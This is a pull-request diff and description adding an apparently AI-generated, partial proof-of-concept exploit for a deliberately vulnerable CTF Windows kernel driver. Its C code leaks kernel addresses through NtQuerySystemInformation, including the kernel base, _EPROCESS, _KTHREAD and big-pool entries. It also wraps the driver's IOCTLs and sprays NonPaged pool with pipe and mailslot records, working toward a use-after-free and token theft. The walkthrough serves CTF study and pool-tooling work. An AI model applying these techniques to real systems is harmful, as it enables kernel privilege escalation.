+ *           via SystemExtendedHandleInformation, and a NonPaged big-pool probe. Print
+ *           them so they can be checked against !process / !thread in the debugger.
+ *   demo  - open the device and drive one Create/SetData/Delete round trip.
+ *
+ * Later stages (UAF reclaim, write-what-where, token steal) build on these.
+ */
+
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+
+/* ---- ntdll surface we need, declared locally (no phnt dependency) ---------------- */
+
+typedef LONG NTSTATUS;
+#define NT_SUCCESS(s) ((s) >= 0)
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+    SystemModuleInformation = 11,
+    SystemExtendedHandleInformation = 64,
+    SystemBigPoolInformation = 66,
+} SYSTEM_INFORMATION_CLASS;
+
+typedef struct _RTL_PROCESS_MODULE_INFORMATION {
+    PVOID  Section;
+    PVOID  MappedBase;
+    PVOID  ImageBase;
+    ULONG  ImageSize;
+    ULONG  Flags;
+    USHORT LoadOrderIndex;
+    USHORT InitOrderIndex;
+    USHORT LoadCount;
+    USHORT OffsetToFileName;
+    UCHAR  FullPathName[256];
+} RTL_PROCESS_MODULE_INFORMATION;
+
+typedef struct _RTL_PROCESS_MODULES {
+    ULONG NumberOfModules;
+    RTL_PROCESS_MODULE_INFORMATION Modules[1];
+} RTL_PROCESS_MODULES;
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
+    PVOID     Object;
+    ULONG_PTR UniqueProcessId;
+    ULONG_PTR HandleValue;
+    ULONG     GrantedAccess;
+    USHORT    CreatorBackTraceIndex;
+    USHORT    ObjectTypeIndex;
+    ULONG     HandleAttributes;
+    ULONG     Reserved;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
+    ULONG_PTR NumberOfHandles;
+    ULONG_PTR Reserved;
+    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
+} SYSTEM_HANDLE_INFORMATION_EX;
+
+typedef struct _SYSTEM_BIGPOOL_ENTRY {
+    union {
+        PVOID     VirtualAddress;
+        ULONG_PTR NonPaged : 1;     /* low bit of the address is a NonPaged flag */
+    };
+    ULONG_PTR SizeInBytes;
+    union {
+        UCHAR Tag[4];
+        ULONG TagUlong;
+    };
+} SYSTEM_BIGPOOL_ENTRY;
+
+typedef struct _SYSTEM_BIGPOOL_INFORMATION {
+    ULONG Count;
+    SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
+} SYSTEM_BIGPOOL_INFORMATION;
+
+typedef NTSTATUS(NTAPI *PFN_NtQuerySystemInformation)(
+    SYSTEM_INFORMATION_CLASS SystemInformationClass,
+    PVOID  SystemInformation,
+    ULONG  SystemInformationLength,
+    PULONG ReturnLength);
+
+static PFN_NtQuerySystemInformation NtQuerySystemInformation;
+
+static int resolve_ntdll(void) {
+    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
+    if (!ntdll) return 0;
+    NtQuerySystemInformation =
+        (PFN_NtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
+    return NtQuerySystemInformation != NULL;
+}
+
+/* Query a variable-length system-information class, growing the buffer until it fits.
+ * Caller frees with free(). Returns NULL on failure. */
+static void *query_sysinfo(SYSTEM_INFORMATION_CLASS cls, ULONG *out_len) {
+    ULONG len = 0x10000;
+    for (;;) {
+        void *buf = malloc(len);
+        if (!buf) return NULL;
+        ULONG need = 0;
+        NTSTATUS st = NtQuerySystemInformation(cls, buf, len, &need);
+        if (NT_SUCCESS(st)) {
+            if (out_len) *out_len = len;
+            return buf;
+        }
+        free(buf);
+        if (st != STATUS_INFO_LENGTH_MISMATCH) return NULL;
+        len = need ? need + 0x2000 : len * 2;   /* need can lag; add slack */
+    }
+}
+
+/* ---- infoleaks ------------------------------------------------------------------- */
+
+/* Kernel image base (first module) and, if present, the module whose file name
+ * contains `want` (case-insensitive). Either out-pointer may be NULL. */
+static int leak_module_bases(uint64_t *kernel_base, const char *want, uint64_t *want_base) {
+    RTL_PROCESS_MODULES *mods = query_sysinfo(SystemModuleInformation, NULL);
+    if (!mods) return 0;
+    if (kernel_base && mods->NumberOfModules)
+        *kernel_base = (uint64_t)mods->Modules[0].ImageBase;
+    if (want_base) *want_base = 0;
+    for (ULONG i = 0; want && want_base && i < mods->NumberOfModules; i++) {
+        RTL_PROCESS_MODULE_INFORMATION *m = &mods->Modules[i];
+        const char *name = (const char *)m->FullPathName + m->OffsetToFileName;
+        if (_stricmp(name, want) == 0) {
+            *want_base = (uint64_t)m->ImageBase;
+            break;
+        }
+    }
+    free(mods);
+    return 1;
+}
+
+/* Kernel object address behind a handle this process owns, via the system-wide
+ * extended handle table. Returns 0 if not found (or addresses are hidden at this IL). */
+static uint64_t leak_object_for_handle(HANDLE handle) {
+    SYSTEM_HANDLE_INFORMATION_EX *info = query_sysinfo(SystemExtendedHandleInformation, NULL);
+    if (!info) return 0;
+    ULONG_PTR me = (ULONG_PTR)GetCurrentProcessId();
+    uint64_t object = 0;
+    for (ULONG_PTR i = 0; i < info->NumberOfHandles; i++) {
+        SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX *e = &info->Handles[i];
+        if (e->UniqueProcessId == me && e->HandleValue == (ULONG_PTR)handle) {
+            object = (uint64_t)e->Object;
+            break;
+        }
+    }
+    free(info);
+    return object;
+}
+
+/* This process's _EPROCESS: the object behind a real handle to ourselves. */
+static uint64_t leak_eprocess(void) {
+    HANDLE h;
+    if (!DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(),
+                         GetCurrentProcess(), &h, 0, FALSE, DUPLICATE_SAME_ACCESS))
+        return 0;
+    uint64_t addr = leak_object_for_handle(h);
+    CloseHandle(h);
+    return addr;
+}
+
+/* This thread's _ETHREAD (== _KTHREAD, Tcb is at offset 0): the object behind a real
+ * handle to ourselves. */
+static uint64_t leak_kthread(void) {
+    HANDLE h = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, GetCurrentThreadId());
+    if (!h) return 0;
+    uint64_t addr = leak_object_for_handle(h);
+    CloseHandle(h);
+    return addr;
+}
+
+/* Prove SystemBigPoolInformation returns real addresses at this IL: report the count
+ * and the first NonPaged entry. */
+static void probe_bigpool(void) {
+    SYSTEM_BIGPOOL_INFORMATION *bp = query_sysinfo(SystemBigPoolInformation, NULL);
+    if (!bp) {
+        printf("  big pool          : query failed\n");
+        return;
+    }
+    uint64_t first = 0;
+    ULONG shown = 0;
+    for (ULONG i = 0; i < bp->Count; i++) {
+        uint64_t va = (uint64_t)bp->AllocatedInfo[i].VirtualAddress;
+        if (va & 1) {                        /* NonPaged flag in the low bit */
+            first = va & ~(uint64_t)0xf;
+            shown = 1;
+            break;
+        }
+    }
+    printf("  big pool          : %lu entries, first NonPaged VA %s%016llx\n",
+           bp->Count, shown ? "0x" : "(none) ", (unsigned long long)first);
+    free(bp);
+}
+
+static int do_leak(void) {
+    uint64_t kbase = 0, drvbase = 0;
+    if (!leak_module_bases(&kbase, "MessageManager.sys", &drvbase)) {
+        printf("SystemModuleInformation failed (need this to work at all)\n");
+        return 1;
+    }
+    uint64_t eproc = leak_eprocess();
+    uint64_t kthread = leak_kthread();
+
+    printf("[leaks]\n");
+    printf("  ntoskrnl base     : 0x%016llx\n", (unsigned long long)kbase);
+    printf("  PsInitialSystemProcess (ntos+0xFC5AB0): 0x%016llx\n",
+           (unsigned long long)(kbase ? kbase + 0xFC5AB0 : 0));
+    printf("  MessageManager base: 0x%016llx%s\n", (unsigned long long)drvbase,
+           drvbase ? "" : "  (driver not loaded?)");
+    printf("  this _EPROCESS     : 0x%016llx%s\n", (unsigned long long)eproc,
+           eproc ? "" : "  (hidden at this IL?)");
+    printf("  this _KTHREAD      : 0x%016llx\n", (unsigned long long)kthread);
+    printf("  KTHREAD.PreviousMode (+0x232): 0x%016llx\n",
+           (unsigned long long)(kthread ? kthread + 0x232 : 0));
+    probe_bigpool();
+    printf("  pid=%lu tid=%lu\n", GetCurrentProcessId(), GetCurrentThreadId());
+    return 0;
+}
+
+/* ---- driver IOCTLs --------------------------------------------------------------- */
+
+#define IOCTL_CREATE  0x222000u
+#define IOCTL_DELETE  0x222004u
+#define IOCTL_SETDATA 0x222008u
+#define IOCTL_FLUSH   0x22200Cu
+
+#pragma pack(push, 1)
+typedef struct _SETDATA_IN {
+    ULONG    Id;
+    ULONGLONG Length;   /* unaligned, matches the driver */
+    UCHAR    Data[1];
+} SETDATA_IN;
+#pragma pack(pop)
+
+static HANDLE open_device(void) {
+    HANDLE h = CreateFileW(L"\\\\.\\MessageDevice", GENERIC_READ | GENERIC_WRITE,
+                           0, NULL, OPEN_EXISTING, 0, NULL);
+    return h == INVALID_HANDLE_VALUE ? NULL : h;
+}
+
+static int mm_create(HANDLE dev, ULONG *id) {
+    DWORD ret = 0;
+    return DeviceIoControl(dev, IOCTL_CREATE, NULL, 0, id, sizeof(*id), &ret, NULL) && ret >= 4;
+}
+
+static int mm_delete(HANDLE dev, ULONG id) {
+    DWORD ret = 0;
+    return DeviceIoControl(dev, IOCTL_DELETE, &id, sizeof(id), NULL, 0, &ret, NULL);
+}
+
+static int mm_setdata(HANDLE dev, ULONG id, const void *data, ULONGLONG len) {
+    DWORD ret = 0;
+    size_t total = sizeof(SETDATA_IN) - 1 + (size_t)len;
+    SETDATA_IN *in = calloc(1, total);
+    if (!in) return 0;
+    in->Id = id;
+    in->Length = len;
+    memcpy(in->Data, data, (size_t)len);
+    int ok = DeviceIoControl(dev, IOCTL_SETDATA, in, (DWORD)total, NULL, 0, &ret, NULL);
+    free(in);
+    return ok;
+}
+
+static int mm_flush(HANDLE dev, ULONG sel) {
+    DWORD ret = 0;
+    return DeviceIoControl(dev, IOCTL_FLUSH, &sel, sizeof(sel), NULL, 0, &ret, NULL);
+}
+
+static int do_demo(void) {
+    HANDLE dev = open_device();
+    if (!dev) {
+        printf("open \\\\.\\MessageDevice failed: %lu\n", GetLastError());
+        return 1;
+    }
+    ULONG id = 0;
+    if (!mm_create(dev, &id)) {
+        printf("Create failed: %lu\n", GetLastError());
+        return 1;
+    }
+    printf("[demo] created id=%lu\n", id);
+
+    UCHAR body[0x40];
+    memset(body, 0x41, sizeof(body));
+    if (!mm_setdata(dev, id, body, sizeof(body)))
+        printf("[demo] SetData failed: %lu\n", GetLastError());
+    else
+        printf("[demo] SetData ok (0x40 bytes -> small list)\n");
+
+    if (!mm_delete(dev, id))
+        printf("[demo] Delete failed: %lu\n", GetLastError());
+    else
+        printf("[demo] Delete ok\n");
+
+    CloseHandle(dev);
+    return 0;
+}
+
+int main(int argc, char **argv) {
+    if (!resolve_ntdll()) {
+        printf("could not resolve NtQuerySystemInformation\n");
+        return 2;
+    }
+    const char *mode = argc > 1 ? argv[1] : "leak";
+    if (_stricmp(mode, "leak") == 0) return do_leak();
+    if (_stricmp(mode, "demo") == 0) return do_demo();
+    printf("usage: %s [leak|demo]\n", argv[0]);
+    return 2;
+}

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -336,11 +336,14 @@ static HANDLE spray_pipe_record(int index, ULONG datalen) {
     UCHAR *rec = malloc(datalen);
     if (!rec) { CloseHandle(client); CloseHandle(server); return NULL; }
     for (ULONG i = 0; i < datalen; i++) rec[i] = (UCHAR)i;  /* ramp: value == offset */
-    memcpy(rec, "MMSPRAY!", 8);                              /* magic to grep for */
+    memcpy(rec, "MMSPRAY!", 8);                              /* magic to grep for (datalen >= 8) */
     DWORD wrote = 0;
-    WriteFile(client, rec, datalen, &wrote, NULL);           /* queued, never read */
+    /* Only a complete write leaves the record resident; a short/failed write would make the
+     * spray count lie about what is actually in the pool. */
+    BOOL wrote_ok = WriteFile(client, rec, datalen, &wrote, NULL) && wrote == datalen;
     free(rec);
     CloseHandle(client);   /* the queued data survives on the server side */
+    if (!wrote_ok) { CloseHandle(server); return NULL; }
     return server;
 }
 
@@ -359,11 +362,12 @@ static HANDLE spray_mailslot_record(int index, ULONG datalen) {
     UCHAR *rec = malloc(datalen);
     if (!rec) { CloseHandle(client); CloseHandle(server); return NULL; }
     for (ULONG i = 0; i < datalen; i++) rec[i] = (UCHAR)i;     /* ramp: value == offset */
-    memcpy(rec, "MMSPRAY!", 8);                                 /* magic to grep for */
+    memcpy(rec, "MMSPRAY!", 8);                                 /* magic to grep for (datalen >= 8) */
     DWORD wrote = 0;
-    WriteFile(client, rec, datalen, &wrote, NULL);              /* queued, never read */
+    BOOL wrote_ok = WriteFile(client, rec, datalen, &wrote, NULL) && wrote == datalen;
     free(rec);
     CloseHandle(client);   /* the queued message survives on the server side */
+    if (!wrote_ok) { CloseHandle(server); return NULL; }
     return server;
 }
 
@@ -371,8 +375,15 @@ static int do_spray(int argc, char **argv) {
     const char *prim = argc > 2 ? argv[2] : "pipe";
     ULONG datalen = argc > 3 ? (ULONG)strtoul(argv[3], NULL, 0) : 0x40;
     int count = argc > 4 ? atoi(argv[4]) : 200;
-    HANDLE (*spray)(int, ULONG) =
-        _stricmp(prim, "mailslot") == 0 ? spray_mailslot_record : spray_pipe_record;
+    int is_mailslot = _stricmp(prim, "mailslot") == 0;
+    HANDLE (*spray)(int, ULONG) = is_mailslot ? spray_mailslot_record : spray_pipe_record;
+    /* The 8-byte magic is memcpy'd unconditionally, so a shorter payload would overflow the
+     * record allocation before any measurement happens. */
+    if (datalen < 8) {
+        printf("[spray] datalen must be >= 8 (the record starts with an 8-byte magic); got 0x%lx\n",
+               datalen);
+        return 2;
+    }
     printf("[spray] %s: %d records of 0x%lx bytes (ramp payload, magic \"MMSPRAY!\")\n",
            prim, count, datalen);
 
@@ -383,8 +394,13 @@ static int do_spray(int argc, char **argv) {
         if (h) held[i] = h, ok++;
     }
     printf("[spray] %d/%d records queued; holding. Inspect NonPaged pool now.\n", ok, count);
-    printf("[spray] pid=%lu — search NonPaged pool for \"MMSPRAY!\", or pool_find_tag NpF*/Msfs.\n",
-           GetCurrentProcessId());
+    /* `pool_find_tag` takes an exact 1-4 byte tag (no wildcards). Pipe write-data is tagged
+     * `NpFr`; mailslot keeps no separate reclaimable chunk, so reach it by the FILE_OBJECT. */
+    const char *hint = is_mailslot
+        ? "reach the message via its FILE_OBJECT (!handle -> FsContext), not a tag"
+        : "pool_find_tag NpFr";
+    printf("[spray] pid=%lu - search NonPaged pool for \"MMSPRAY!\", or %s.\n",
+           GetCurrentProcessId(), hint);
     fflush(stdout);
     Sleep(600 * 1000);   /* hold long enough to detach->reattach->inspect */
     for (int i = 0; i < count; i++) if (held[i]) CloseHandle(held[i]);


### PR DESCRIPTION
## What this adds

A walkthrough and PoC for the **MessageManager** CTF kernel driver, exercised end to end on a live
KDNET Windows Server 26100 target with this repo's tools. Its main purpose is to showcase the
kernel-pool tooling (`pool_find_tag` / `pool_chunk` / `pool_census` / `pool_diagnostics`) on a real
bug, and to be honest about how far a modern data-only exploit gets.

- **`docs/messagemanager-walkthrough.md`** — the tour: no-PDB driver reverse (all four IOCTL
  handlers, the `Tgsm` MESSAGE layout, the handle/message lists), the locking use-after-free and its
  Verifier bugcheck, the four Windows-26100 pool-walker breakages that had to be fixed to *see* the
  bug, the `NtQuerySystemInformation` ASLR defeat (validated against the debugger), and a measured
  analysis of the exploit primitives.
- **`examples/messagemanager/mm_exploit.c`** (+ `build.cmd`) — the PoC: `NtQuerySystemInformation`
  infoleaks (kernel/driver base, this `_EPROCESS`/`_KTHREAD`, big-pool), METHOD_BUFFERED IOCTL
  wrappers, and a NonPaged reclaim-measurement mode (`spray pipe|mailslot`) used to probe reclaim
  candidates with the pool tools.

## Status — deliberately honest

This establishes **exploitability, not a shell.** The UAF is confirmed and reproducible, control of
the freed chunk is demonstrated, and the two forward primitives (an unlink write-what-where and an
unconditional arbitrary-free) are pinned to exact instructions. What is **not** solved is the
reclaim: the bug's exploitable fields sit at chunk +0x08/+0x10/+0x18, and every standard medium-IL
NonPagedNx spray measured here (pipe write-data, I/O ring, mailslot) puts a ≥0x10 header above them.
The mitigations (SMEP+SMAP+CET all on) rule out ROP, so the payoff has to be data-only — which is in
hand except for that reclaim. The double-free → type-confusion route that would sidestep it is noted
as future work. Section 6 of the walkthrough lays this out in full.

The exploit code is a work in progress on this branch; the walkthrough is complete.

🤖 Generated with [Claude Code](https://claude.com/claude-code)


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added a Windows example utility with address reporting, driver interaction demonstrations and configurable diagnostic modes.
  * Added a build script to simplify compiling the Windows example with the 64-bit MSVC toolchain.
* **Documentation**
  * Added a comprehensive walkthrough covering debugging, memory inspection, vulnerability analysis and troubleshooting on Windows.
* **Chores**
  * Added ignore rules for generated Windows build artefacts.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->